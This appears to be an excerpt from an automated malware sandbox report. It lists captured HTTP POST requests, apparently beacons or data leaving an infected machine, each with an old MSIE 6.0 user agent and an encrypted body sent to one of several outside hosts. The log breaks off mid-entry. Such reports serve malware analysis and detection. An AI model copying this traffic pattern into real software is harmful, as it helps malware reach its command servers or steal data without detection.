                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 75 56 2b 79 51 57 6f 33 59 32 6c 7a 6d 6d 76 6a 54 66 2f 6d 68 79 33 55 36 53 61 61 4d 2f 42 4c 50 76 68 47 7a 6c 36 48 50 4c 6c 33 61 54 52 58 49 46 35 7a 32 48 70 52 6c 4b 7a 30 68 74 37 55 52 43 57 4e 69 36 33 32 52 4e 78 71 6c 58 70 36 70 63 78 69 64 71 50 31 34 73 39 65 5a 77 77 38 41 43 54 56 56 4b 69 46 4b 44 36 37 57 46 59 2f 61 7a 55 6b 46 65 33 52 4f 2f 7a 56 4d 2f 70 4c 50 42 74 78 65 76 47 49 59 2f 53 33 4a 41 58 49 33 6d 2f 32 44 47 65 48 4b 77 48 62 6f 5a 54 45 35 61 61 2f 67 41 4d 44 6c 7a 2b 6d 6f 6e 76 7a 62 6f 37 2b 2f 4c 58 58 5a 42 43 65 31 4e 4e 59 4b 53 64 47 52 54 61 2f 51 57 2b 70 64 44 6f 59 36 7a 2b 39 75 74 78 7a 53 33 57 43 68 4f 74 7a 42 51 72 41 33 71 61 42 53 33 6d 78 63 74 59 73 73 56 33 49 5a 66 35 6c 52 75 50 2b 72 36 72 77 68 34 2f 77 5a 55 54 63 49 6e 7a 76 4c 36 65 76 63 41 38 6c 43 56 46 41 35 6b 56 45 30 31 4b 2f 71 6e 65 66 61 33 37 39 39 47 7a 68 68 49 6f 64 4e 44 55 6a 56 65 75 43 43 4d 36 57 72 2b 76 72 55 4a 5a 41 30 70 30 45 4d 7a 4c 44 6c 31 4d 68 33 68 52 47 33 45 4e 41 35 5a 33 61 54 62 68 35 4e 42 6f 73 65 4a 4d 6c 61 51 47 66 64 6a 4f 47 32 75 43 55 35 6c 2f 79 75 63 74 50 4b 49 63 73 65 57 5a 75 62 5a 78 38 4a 62 72 65 66 47 67 34 69 6d 52 50 66 2f 4f 74 72 69 33 6d 70 56 73 56 6e 4d 4a 2b 47 47 34 72 45 33 37 36 76 37 66 6b 30 4d 32 2f 6e 30 38 33 59 4f 5a 76 51 77 6c 35 69 52 48 6c 35 76 73 4d 41 46 76 67 64 52 54 4f 76 66 56 6f 71 71 64 59 43 48 6d 38 57 78 61 41 57 69 47 57 42 76 61 39 73 4a 6f 5a 48 34 39 76 61 36 75 6a 4c 4b 39 77 4e 31 51 58 2f 4e 79 4f 46 36 2b 35 74 50 4c 4b 6a 33 5a 73 76 47 58 59 71 31 63 46 6b 7a 58 69 4e 55 76 6e 43 2f 37 61 6b 58 4a 78 68 6b 72 2b 56 43 6a 30 4c 6f 4e 75 2f 6d 34 3d Data Ascii: uV+yQWo3Y2lzmmvjTf/mhy3U6SaaM/BLPvhGzl6HPLl3aTRXIF5z2HpRlKz0ht7URCWNi632RNxqlXp6pcxidqP14s9eZww8ACTVVKiFKD67WFY/azUkFe3RO/zVM/pLPBtxevGIY/S3JAXI3m/2DGeHKwHboZTE5aa/gAMDlz+monvzbo7+/LXXZBCe1NNYKSdGRTa/QW+pdDoY6z+9utxzS3WChOtzBQrA3qaBS3mxctYssV3IZf5lRuP+r6rwh4/wZUTcInzvL6evcA8lCVFA5kVE01K/qnefa3799GzhhIodNDUjVeuCCM6Wr+vrUJZA0p0EMzLDl1Mh3hRG3ENA5Z3aTbh5NBoseJMlaQGfdjOG2uCU5l/yuctPKIcseWZubZx8JbrefGg4imRPf/Otri3mpVsVnMJ+GG4rE376v7fk0M2/n083YOZvQwl5iRHl5vsMAFvgdRTOvfVoqqdYCHm8WxaAWiGWBva9sJoZH49va6ujLK9wN1QX/NyOF6+5tPLKj3ZsvGXYq1cFkzXiNUvnC/7akXJxhkr+VCj0LoNu/m4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 4a 76 4a 55 51 42 4d 73 59 32 6c 6d 53 6c 44 75 32 73 4c 69 5a 37 77 58 78 39 62 35 4d 36 6d 57 39 38 72 6c 57 43 4f 70 4d 5a 65 54 4e 6d 2b 74 2f 4c 6a 63 45 33 54 55 71 75 6d 7a 4a 73 38 4f 62 34 55 30 65 44 66 6f 6d 4c 4a 47 53 6e 79 39 68 35 4b 6a 51 76 44 72 44 6a 6e 71 4e 6d 30 57 4f 4e 2f 76 78 38 51 45 52 71 36 74 69 69 50 33 65 36 44 43 4c 74 2f 39 57 48 73 77 44 6a 71 64 4c 57 6b 68 42 2f 61 67 35 5a 32 61 73 6e 34 42 39 64 76 73 46 36 46 2b 69 44 39 55 6c 4f 4c 6a 63 5a 30 6e 68 72 4f 42 55 30 64 62 51 74 37 76 36 78 6f 47 6d 63 61 6d 76 2f 57 6b 58 2b 4b 57 79 72 76 37 64 74 7a 74 4a 63 53 4b 56 51 68 4c 35 74 48 73 67 75 66 71 53 71 4c 70 43 49 33 4e 61 4e 4a 73 37 71 55 69 4a 38 6f 6d 37 79 75 61 37 4b 55 64 63 4e 36 38 74 2f 74 78 74 33 78 44 50 33 6d 47 57 42 4f 67 45 2f 63 7a 47 59 6a 68 6c 33 6b 66 55 4b 6c 6a 4a 34 68 35 66 74 72 46 6f 36 4a 55 6a 75 4d 32 2b 55 45 4b 6b 6a 79 6e 61 56 6a 37 4d 6c 4e 79 4d 64 5a 55 48 72 56 52 6d 44 2f 38 56 6a 54 74 68 43 4c 4e 52 50 6f 6d 32 65 6f 34 6d 45 72 56 50 4e 33 58 61 6e 32 41 73 6d 36 74 58 2b 6a 4e 54 67 34 70 49 65 70 61 62 42 5a 4f 4b 4b 7a 2b 4c 46 78 59 6d 7a 68 58 79 45 50 30 38 72 61 32 54 4f 57 67 47 63 33 6b 66 36 6f 43 7a 61 41 77 52 30 4f 78 69 2b 66 55 34 68 48 67 64 69 4f 37 6f 58 66 71 61 4f 63 6a 55 41 56 39 31 31 51 35 64 63 63 72 32 67 37 53 78 45 4a 6a 65 35 58 4b 35 49 46 45 42 38 4e 30 41 50 47 49 7a 43 79 35 4a 4f 4a 2f 51 2b 63 2f 58 46 59 5a 4c 74 47 73 6f 50 4b 72 50 34 57 38 38 32 49 6c 42 4b 32 6d 50 4d 43 41 43 6f 74 62 62 4b 6c 50 6a 31 44 45 79 33 53 7a 62 51 67 50 54 6b 79 44 70 64 78 37 54 7a 69 4a 4c 6c 46 63 4e 48 31 4a Data Ascii: JvJUQBMsY2lmSlDu2sLiZ7wXx9b5M6mW98rlWCOpMZeTNm+t/LjcE3TUqumzJs8Ob4U0eDfomLJGSny9h5KjQvDrDjnqNm0WON/vx8QERq6tiiP3e6DCLt/9WHswDjqdLWkhB/ag5Z2asn4B9dvsF6F+iD9UlOLjcZ0nhrOBU0dbQt7v6xoGmcamv/WkX+KWyrv7dtztJcSKVQhL5tHsgufqSqLpCI3NaNJs7qUiJ8om7yua7KUdcN68t/txt3xDP3mGWBOgE/czGYjhl3kfUKljJ4h5ftrFo6JUjuM2+UEKkjynaVj7MlNyMdZUHrVRmD/8VjTthCLNRPom2eo4mErVPN3Xan2Asm6tX+jNTg4pIepabBZOKKz+LFxYmzhXyEP08ra2TOWgGc3kf6oCzaAwR0Oxi+fU4hHgdiO7oXfqaOcjUAV911Q5dccr2g7SxEJje5XK5IFEB8N0APGIzCy5JOJ/Q+c/XFYZLtGsoPKrP4W882IlBK2mPMCACotbbKlPj1DEy3SzbQgPTkyDpdx7TziJLlFcNH1J
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 31 4d 64 4a 48 39 61 35 63 6d 6c 6d 66 34 38 72 73 61 63 7a 63 33 6d 39 70 66 39 32 46 4e 76 30 61 67 76 4b 52 6b 37 68 79 53 59 58 66 4a 2b 63 6b 65 4f 4b 32 77 74 31 70 57 55 30 76 36 39 53 62 6b 50 36 4c 56 69 39 56 7a 46 63 42 35 2b 6e 38 62 56 47 64 53 4a 44 49 74 4e 6e 66 4b 61 46 54 44 62 51 71 2f 2b 77 4d 44 35 53 71 37 32 77 53 4c 4f 2b 57 52 30 33 46 43 72 78 4b 2f 4a 2f 74 46 6d 79 62 38 68 4a 6e 47 6c 62 51 41 32 79 57 48 69 57 2b 47 2b 4f 48 34 50 63 70 6c 69 54 35 74 48 74 79 73 4f 4a 78 61 46 34 34 41 64 56 4f 55 2b 78 76 69 70 47 6b 6f 56 55 31 59 43 41 6a 46 32 4b 54 49 31 4c 35 41 66 46 43 50 71 69 62 2b 74 51 37 4d 79 6d 6f 63 75 30 31 7a 71 66 31 6e 71 4f 6c 64 56 77 4d 31 6c 43 76 56 37 4a 4b 67 49 44 51 49 66 75 4c 4d 6c 47 49 39 75 4d 50 71 50 6b 31 51 53 31 33 47 32 6c 31 52 38 53 48 39 79 4c 38 59 6e 49 2b 6f 6c 79 38 38 52 44 46 74 6f 59 79 6b 6b 4e 34 36 55 2b 34 47 2b 73 44 6f 32 41 53 43 45 51 77 35 54 65 63 37 63 33 34 42 43 52 65 68 49 55 4d 46 2f 56 7a 47 35 72 35 43 31 6d 75 79 72 4c 30 68 2f 6f 69 7a 43 51 4f 65 4d 6d 53 5a 2f 69 36 4a 6e 7a 74 49 52 62 66 39 30 64 46 66 6f 65 38 6c 69 59 51 4d 62 52 76 46 34 73 32 77 72 58 66 4e 2b 4a 51 39 4a 4a 57 4c 4d 62 35 31 45 36 42 47 67 66 77 58 79 59 66 38 4c 43 36 33 6a 6e 35 4e 64 63 61 53 61 6e 58 57 34 4b 6b 7a 36 64 37 6c 50 53 6d 34 33 43 66 56 57 42 79 64 68 6b 32 77 6a 45 4a 6d 4e 46 66 6a 73 59 6d 44 31 59 62 7a 6c 67 69 56 4d 6f 69 45 35 48 6b 55 6b 77 4e 2b 47 56 56 39 72 2f 57 76 65 30 75 6b 75 6f 35 77 53 6a 59 41 4a 46 58 58 4a 73 7a 4f 59 37 63 79 68 6c 63 61 38 6f 68 4c 4c 6a 4d 62 6d 6f 59 6c 65 6f 69 59 4c 33 2b 2b 6b 6e 79 54 2b 33 65 38 48 78 37 74 4f 2f 63 47 41 6a 6a 44 58 54 46 68 71 34 5a 30 52 2f 30 51 3d 3d Data Ascii: 1MdJH9a5cmlmf48rsaczc3m9pf92FNv0agvKRk7hySYXfJ+ckeOK2wt1pWU0v69SbkP6LVi9VzFcB5+n8bVGdSJDItNnfKaFTDbQq/+wMD5Sq72wSLO+WR03FCrxK/J/tFmyb8hJnGlbQA2yWHiW+G+OH4PcpliT5tHtysOJxaF44AdVOU+xvipGkoVU1YCAjF2KTI1L5AfFCPqib+tQ7Mymocu01zqf1nqOldVwM1lCvV7JKgIDQIfuLMlGI9uMPqPk1QS13G2l1R8SH9yL8YnI+oly88RDFtoYykkN46U+4G+sDo2ASCEQw5Tec7c34BCRehIUMF/VzG5r5C1muyrL0h/oizCQOeMmSZ/i6JnztIRbf90dFfoe8liYQMbRvF4s2wrXfN+JQ9JJWLMb51E6BGgfwXyYf8LC63jn5NdcaSanXW4Kkz6d7lPSm43CfVWBydhk2wjEJmNFfjsYmD1YbzlgiVMoiE5HkUkwN+GVV9r/Wve0ukuo5wSjYAJFXXJszOY7cyhlca8ohLLjMbmoYleoiYL3++knyT+3e8Hx7tO/cGAjjDXTFhq4Z0R/0Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 6f 66 36 62 39 5a 32 76 65 57 6d 39 73 57 2f 47 31 47 7a 71 4f 64 61 42 47 53 6c 4c 4a 30 46 64 49 64 4b 52 76 41 37 65 64 5a 51 35 55 77 67 74 59 35 64 55 52 52 56 61 35 48 4e 63 59 44 43 52 68 7a 69 30 39 34 2b 75 39 50 53 4e 4e 68 48 78 32 36 64 69 37 52 45 64 68 6f 69 34 5a 38 31 6a 65 57 62 6c 34 74 44 49 4a 46 2f 57 4d 6b 69 2b 38 6a 68 36 47 50 50 51 4d 36 65 76 45 73 77 4e 70 6e 75 58 6a 78 50 52 6e 2b 65 31 71 74 69 6b 50 77 6d 6a 41 61 4a 52 78 70 70 49 69 66 4c 4f 57 50 70 75 6c 47 46 6c 41 66 67 43 4d 32 56 73 6e 38 48 6c 45 5a 2f 79 77 77 6e 2f 64 72 31 70 57 37 32 47 54 6c 72 78 2f 6f 77 34 49 58 37 36 63 32 57 67 79 41 63 35 79 55 44 6c 5a 31 57 4c 71 52 41 72 38 64 4b 36 6e 30 71 4b 6c 69 51 57 6a 34 54 39 48 48 4e 69 43 75 44 41 77 66 57 75 4e 6c 75 64 72 75 65 35 53 68 79 52 39 62 33 32 58 46 49 64 7a 67 68 4f 34 64 57 55 48 33 5a 59 52 4a 4d 39 58 67 78 37 44 46 55 63 51 47 69 62 46 4e 6b 38 44 73 77 71 73 39 62 63 36 7a 69 35 6a 70 5a 53 51 73 62 51 59 58 4f 70 6a 78 41 5a 64 4e 54 44 2f 7a 48 58 77 65 44 73 74 51 6b 6e 66 65 45 71 34 51 65 57 6b 46 53 56 38 79 75 58 47 44 78 34 5a 66 4e 46 48 7a 4d 78 49 65 5a 59 46 53 66 6f 69 57 64 43 5a 58 54 66 35 2b 6b 65 47 34 52 51 56 70 41 41 78 6c 56 4f 69 6c 62 32 37 4e 44 6c 55 6f 5a 6f 71 38 2f 78 30 70 30 6a 6b 2b 53 36 57 42 72 56 58 59 54 4e 6f 65 7a 43 32 34 50 69 32 76 36 4e 58 51 6e 4f 55 58 52 34 77 6f 72 6a 77 4a 7a 31 65 5a 4b 63 6d 58 4f 53 32 68 50 64 6a 45 45 36 6a 71 54 73 50 59 56 68 4e 67 63 54 77 32 4a 4c 4b 42 62 6c 43 38 50 47 53 57 4b 37 59 77 6e 2f 57 79 37 46 30 6d 67 45 56 39 4d 37 30 66 47 6c 59 68 75 56 6b 41 3d 3d Data Ascii: of6b9Z2veWm9sW/G1GzqOdaBGSlLJ0FdIdKRvA7edZQ5UwgtY5dURRVa5HNcYDCRhzi094+u9PSNNhHx26di7REdhoi4Z81jeWbl4tDIJF/WMki+8jh6GPPQM6evEswNpnuXjxPRn+e1qtikPwmjAaJRxppIifLOWPpulGFlAfgCM2Vsn8HlEZ/ywwn/dr1pW72GTlrx/ow4IX76c2WgyAc5yUDlZ1WLqRAr8dK6n0qKliQWj4T9HHNiCuDAwfWuNludrue5ShyR9b32XFIdzghO4dWUH3ZYRJM9Xgx7DFUcQGibFNk8Dswqs9bc6zi5jpZSQsbQYXOpjxAZdNTD/zHXweDstQknfeEq4QeWkFSV8yuXGDx4ZfNFHzMxIeZYFSfoiWdCZXTf5+keG4RQVpAAxlVOilb27NDlUoZoq8/x0p0jk+S6WBrVXYTNoezC24Pi2v6NXQnOUXR4worjwJz1eZKcmXOS2hPdjEE6jqTsPYVhNgcTw2JLKBblC8PGSWK7Ywn/Wy7F0mgEV9M70fGlYhuVkA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 4a 76 4a 55 51 42 4d 73 59 32 6c 6d 53 6c 44 75 32 73 4c 69 5a 37 77 58 78 39 62 35 4d 36 6d 57 39 38 72 6c 57 43 4f 70 4d 5a 65 54 4e 6d 2b 74 2f 4c 6a 63 45 33 54 55 71 75 6d 7a 4a 73 38 4f 62 34 55 30 65 44 66 6f 6d 4c 4a 47 53 6e 79 39 68 35 4b 6a 51 76 44 72 44 6a 6e 71 4e 6d 30 57 4f 4e 2f 76 78 38 51 45 52 71 36 74 69 69 50 33 65 36 44 43 4c 74 2f 39 57 48 73 77 44 6a 71 64 4c 57 6b 68 42 2f 61 67 35 5a 32 61 73 6e 34 42 39 64 76 73 46 36 46 2b 69 44 39 55 6c 4f 4c 6a 63 5a 30 6e 68 72 4f 42 55 30 64 62 51 74 37 76 36 78 6f 47 6d 63 61 6d 76 2f 57 6b 58 2b 4b 57 79 72 76 37 64 74 7a 74 4a 63 53 4b 56 51 68 4c 35 74 48 73 67 75 66 71 53 71 4c 70 43 49 33 4e 61 4e 4a 73 37 71 55 69 4a 38 6f 6d 37 79 75 61 37 4b 55 64 63 4e 36 38 74 2f 74 78 74 33 78 44 50 33 6d 47 57 42 4f 67 45 2f 63 7a 47 59 6a 68 6c 33 6b 66 55 4b 6c 6a 4a 34 68 35 66 74 72 46 6f 36 4a 55 6a 75 4d 32 2b 55 45 4b 6b 6a 79 6e 61 56 6a 37 4d 6c 4e 79 4d 64 5a 55 48 72 56 52 6d 44 2f 38 56 6a 54 74 68 43 4c 4e 52 50 6f 6d 32 65 6f 34 6d 45 72 56 50 4e 33 58 61 6e 32 41 73 6d 36 74 58 2b 6a 4e 54 67 34 70 49 65 70 61 62 42 5a 4f 4b 4b 7a 2b 4c 46 78 59 6d 7a 68 58 79 45 50 30 38 72 61 32 54 4f 57 67 47 63 33 6b 66 36 6f 43 7a 61 41 77 52 30 4f 78 69 2b 66 55 34 68 48 67 64 69 4f 37 6f 58 66 71 61 4f 63 6a 55 41 56 39 31 31 51 35 64 63 63 72 32 67 37 53 78 45 4a 6a 65 35 58 4b 35 49 46 45 42 38 4e 30 41 50 47 49 7a 43 79 35 4a 4f 4a 2f 51 2b 63 2f 58 46 59 5a 4c 74 47 73 6f 50 4b 72 50 34 57 38 38 32 49 6c 42 4b 32 6d 50 4d 43 41 43 6f 74 62 62 4b 6c 50 6a 31 44 45 79 33 53 7a 62 51 67 50 54 6b 79 44 70 64 78 37 54 7a 69 4a 4c 6c 46 63 4e 48 31 4a Data Ascii: JvJUQBMsY2lmSlDu2sLiZ7wXx9b5M6mW98rlWCOpMZeTNm+t/LjcE3TUqumzJs8Ob4U0eDfomLJGSny9h5KjQvDrDjnqNm0WON/vx8QERq6tiiP3e6DCLt/9WHswDjqdLWkhB/ag5Z2asn4B9dvsF6F+iD9UlOLjcZ0nhrOBU0dbQt7v6xoGmcamv/WkX+KWyrv7dtztJcSKVQhL5tHsgufqSqLpCI3NaNJs7qUiJ8om7yua7KUdcN68t/txt3xDP3mGWBOgE/czGYjhl3kfUKljJ4h5ftrFo6JUjuM2+UEKkjynaVj7MlNyMdZUHrVRmD/8VjTthCLNRPom2eo4mErVPN3Xan2Asm6tX+jNTg4pIepabBZOKKz+LFxYmzhXyEP08ra2TOWgGc3kf6oCzaAwR0Oxi+fU4hHgdiO7oXfqaOcjUAV911Q5dccr2g7SxEJje5XK5IFEB8N0APGIzCy5JOJ/Q+c/XFYZLtGsoPKrP4W882IlBK2mPMCACotbbKlPj1DEy3SzbQgPTkyDpdx7TziJLlFcNH1J
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 55 69 74 6a 71 38 32 57 66 32 6e 4c 39 76 35 52 52 45 6b 45 4b 49 5a 67 6c 43 34 37 31 6d 68 59 55 52 77 31 43 65 2f 47 76 33 6a 77 41 63 75 54 58 4f 62 35 79 4c 6b 2b 6e 79 4e 45 70 64 63 6e 58 37 68 32 64 6b 6b 32 5a 44 33 33 4c 31 64 69 59 47 39 6f 71 48 30 52 79 6c 4c 46 54 2b 6a 2b 48 43 42 62 53 30 6d 4f 58 47 56 39 44 6a 69 56 54 38 54 61 6d 2b 70 73 47 47 63 39 37 76 65 68 70 33 5a 51 35 61 75 65 58 51 47 6f 53 7a 55 53 31 58 6d 6a 6e 72 69 67 49 49 2f 31 52 54 43 72 4d 32 48 4c 32 76 4c 56 53 57 51 78 44 63 47 34 61 50 6f 6b 69 66 69 6b 4a 61 61 5a 76 53 39 6f 62 47 63 2b 70 64 73 5a 53 74 6d 32 35 39 32 65 37 75 6d 36 64 31 69 38 62 62 54 30 41 48 52 55 43 76 56 70 71 6d 62 57 63 69 35 6a 41 66 30 62 46 52 66 32 59 33 75 61 2f 39 39 56 67 61 32 34 70 67 2f 70 35 4e 4c 53 55 52 2b 56 73 34 55 71 35 48 4f 32 6f 2b 49 65 45 42 43 4f 55 49 4f 65 35 63 50 2b 39 31 46 72 39 31 53 41 66 62 64 63 47 57 34 52 49 2f 35 58 6c 79 30 42 30 71 6e 75 44 46 4f 39 5a 4c 63 68 63 36 61 42 67 63 57 79 4a 4d 33 58 7a 72 52 55 62 4c 6b 4c 63 72 59 49 72 66 6b 73 74 4d 37 57 54 45 33 42 36 78 72 58 70 6e 4c 6d 69 67 30 68 64 78 78 73 31 35 77 48 5a 51 52 79 65 38 30 59 72 4e 30 63 41 65 66 4e 2b 73 6b 4a 45 69 51 62 68 70 6b 51 49 78 4d 65 68 66 51 30 7a 69 79 67 52 58 4c 35 4e 2f 7a 67 48 64 62 39 66 61 69 71 2b 2b 33 6f 78 66 69 73 4f 51 2b 6a 53 45 67 6e 4e 6e 52 38 4a 70 7a 37 53 48 66 62 6d 64 59 4d 72 2b 72 64 56 6b 44 6b 39 4a 6a 48 62 7a 37 66 41 38 4d 37 31 5a 74 53 32 62 30 52 4f 77 54 30 6e 76 75 78 42 4c 71 35 4a 6c 76 55 69 4d 59 79 67 76 69 48 79 6b 38 49 79 4f 2b 71 32 62 49 2f 4a 4e 48 33 2b 6b 49 76 6f 6d 2b 79 75 7a 30 37 35 48 65 36 61 58 6b 62 2f 57 49 3d Data Ascii: Uitjq82Wf2nL9v5RREkEKIZglC471mhYURw1Ce/Gv3jwAcuTXOb5yLk+nyNEpdcnX7h2dkk2ZD33L1diYG9oqH0RylLFT+j+HCBbS0mOXGV9DjiVT8Tam+psGGc97vehp3ZQ5aueXQGoSzUS1XmjnrigII/1RTCrM2HL2vLVSWQxDcG4aPokifikJaaZvS9obGc+pdsZStm2592e7um6d1i8bbT0AHRUCvVpqmbWci5jAf0bFRf2Y3ua/99Vga24pg/p5NLSUR+Vs4Uq5HO2o+IeEBCOUIOe5cP+91Fr91SAfbdcGW4RI/5Xly0B0qnuDFO9ZLchc6aBgcWyJM3XzrRUbLkLcrYIrfkstM7WTE3B6xrXpnLmig0hdxxs15wHZQRye80YrN0cAefN+skJEiQbhpkQIxMehfQ0ziygRXL5N/zgHdb9faiq++3oxfisOQ+jSEgnNnR8Jpz7SHfbmdYMr+rdVkDk9JjHbz7fA8M71ZtS2b0ROwT0nvuxBLq5JlvUiMYygviHyk8IyO+q2bI/JNH3+kIvom+yuz075He6aXkb/WI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 30 6b 2b 72 48 42 43 6b 63 6d 6d 41 6a 6c 53 76 6f 36 67 76 53 73 4d 31 64 47 6f 34 66 48 39 6b 52 42 53 43 38 73 6e 61 77 2b 4a 34 4a 65 66 42 72 47 53 6f 57 76 76 4d 39 71 38 73 51 4f 48 39 74 45 61 47 62 55 6d 44 6f 59 73 4d 53 42 44 30 45 73 44 57 72 6f 31 2b 63 79 75 70 42 2f 48 77 72 70 49 7a 63 74 43 74 46 6d 51 44 78 6b 33 36 38 62 6e 72 43 30 78 4e 73 6a 6a 73 33 4f 4c 70 6d 75 2b 2f 76 48 65 69 55 42 31 77 44 53 72 35 34 4a 4b 30 74 44 48 41 55 5a 4a 32 4c 31 37 73 79 6d 4a 77 66 63 69 62 30 6d 4b 48 64 45 63 46 31 49 4f 68 61 34 58 6c 61 44 75 63 74 77 62 37 72 72 46 66 58 37 77 43 58 30 7a 41 69 4f 55 44 41 54 68 43 58 33 65 51 45 75 33 6b 4c 71 4d 71 72 4d 64 56 49 5a 59 49 33 38 4d 77 4c 6d 42 77 61 66 66 47 6d 52 58 76 33 42 6c 68 78 71 56 33 49 77 53 46 36 67 69 66 72 4d 4b 78 73 2b 73 4e 6b 6f 56 4c 41 6e 77 53 74 2f 33 53 5a 5a 4e 52 61 2b 6f 35 43 78 71 72 35 2b 74 54 57 67 4b 67 69 6d 38 78 58 36 31 51 43 61 53 62 62 41 41 65 4a 64 41 73 4f 68 73 55 6e 6c 6c 55 77 4c 4d 51 7a 70 59 4f 67 61 68 66 66 79 58 48 66 52 34 69 74 73 6d 5a 6e 67 4e 6b 62 4a 6b 32 5a 48 76 57 33 45 6b 58 78 77 4e 31 34 74 4c 73 70 4c 69 4e 59 51 57 49 36 55 4d 56 31 2f 38 41 6e 4f 34 58 69 2f 42 49 4f 45 4e 2b 33 41 4e 51 41 35 39 47 62 78 38 70 34 77 73 48 59 39 66 6c 68 76 67 6f 42 6f 6e 53 71 2b 37 53 78 4c 56 57 65 30 2f 61 77 64 73 43 41 44 6d 46 62 4f 72 62 48 75 64 6b 31 4c 51 66 6e 6f 37 35 57 51 35 33 67 51 59 4f 31 7a 34 52 42 6e 57 6a 42 52 4c 54 62 47 59 64 39 63 70 76 72 74 7a 41 6b 30 77 50 70 33 52 44 31 70 70 43 66 6b 63 37 71 75 38 4f 59 37 49 4d 71 75 79 65 68 53 72 2b 55 62 47 7a 64 73 30 6e 41 32 41 6d 6e 77 62 75 38 55 45 50 65 54 58 74 66 59 4d 51 6e 4a 55 6b 39 33 34 6a 37 36 31 6f 4c 4a 62 44 31 6b 4e 61 48 7a 38 42 50 65 38 3d Data Ascii: 0k+rHBCkcmmAjlSvo6gvSsM1dGo4fH9kRBSC8snaw+J4JefBrGSoWvvM9q8sQOH9tEaGbUmDoYsMSBD0EsDWro1+cyupB/HwrpIzctCtFmQDxk368bnrC0xNsjjs3OLpmu+/vHeiUB1wDSr54JK0tDHAUZJ2L17symJwfcib0mKHdEcF1IOha4XlaDuctwb7rrFfX7wCX0zAiOUDAThCX3eQEu3kLqMqrMdVIZYI38MwLmBwaffGmRXv3BlhxqV3IwSF6gifrMKxs+sNkoVLAnwSt/3SZZNRa+o5Cxqr5+tTWgKgim8xX61QCaSbbAAeJdAsOhsUnllUwLMQzpYOgahffyXHfR4itsmZngNkbJk2ZHvW3EkXxwN14tLspLiNYQWI6UMV1/8AnO4Xi/BIOEN+3ANQA59Gbx8p4wsHY9flhvgoBonSq+7SxLVWe0/awdsCADmFbOrbHudk1LQfno75WQ53gQYO1z4RBnWjBRLTbGYd9cpvrtzAk0wPp3RD1ppCfkc7qu8OY7IMquyehSr+UbGzds0nA2Amnwbu8UEPeTXtfYMQnJUk934j761oLJbD1kNaHz8BPe8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 55 69 74 6a 71 38 32 57 66 32 6e 4c 39 76 35 52 52 45 6b 45 4b 49 5a 67 6c 43 34 37 31 6d 68 59 55 52 77 31 43 65 2f 47 76 33 6a 77 41 63 75 54 58 4f 62 35 79 4c 6b 2b 6e 79 4e 45 70 64 63 6e 58 37 68 32 64 6b 6b 32 5a 44 33 33 4c 31 64 69 59 47 39 6f 71 48 30 52 79 6c 4c 46 54 2b 6a 2b 48 43 42 62 53 30 6d 4f 58 47 56 39 44 6a 69 56 54 38 54 61 6d 2b 70 73 47 47 63 39 37 76 65 68 70 33 5a 51 35 61 75 65 58 51 47 6f 53 7a 55 53 31 58 6d 6a 6e 72 69 67 49 49 2f 31 52 54 43 72 4d 32 48 4c 32 76 4c 56 53 57 51 78 44 63 47 34 61 50 6f 6b 69 66 69 6b 4a 61 61 5a 76 53 39 6f 62 47 63 2b 70 64 73 5a 53 74 6d 32 35 39 32 65 37 75 6d 36 64 31 69 38 62 62 54 30 41 48 52 55 43 76 56 70 71 6d 62 57 63 69 35 6a 41 66 30 62 46 52 66 32 59 33 75 61 2f 39 39 56 67 61 32 34 70 67 2f 70 35 4e 4c 53 55 52 2b 56 73 34 55 71 35 48 4f 32 6f 2b 49 65 45 42 43 4f 55 49 4f 65 35 63 50 2b 39 31 46 72 39 31 53 41 66 62 64 63 47 57 34 52 49 2f 35 58 6c 79 30 42 30 71 6e 75 44 46 4f 39 5a 4c 63 68 63 36 61 42 67 63 57 79 4a 4d 33 58 7a 72 52 55 62 4c 6b 4c 63 72 59 49 72 66 6b 73 74 4d 37 57 54 45 33 42 36 78 72 58 70 6e 4c 6d 69 67 30 68 64 78 78 73 31 35 77 48 5a 51 52 79 65 38 30 59 72 4e 30 63 41 65 66 4e 2b 73 6b 4a 45 69 51 62 68 70 6b 51 49 78 4d 65 68 66 51 30 7a 69 79 67 52 58 4c 35 4e 2f 7a 67 48 64 62 39 66 61 69 71 2b 2b 33 6f 78 66 69 73 4f 51 2b 6a 53 45 67 6e 4e 6e 52 38 4a 70 7a 37 53 48 66 62 6d 64 59 4d 72 2b 72 64 56 6b 44 6b 39 4a 6a 48 62 7a 37 66 41 38 4d 37 31 5a 74 53 32 62 30 52 4f 77 54 30 6e 76 75 78 42 4c 71 35 4a 6c 76 55 69 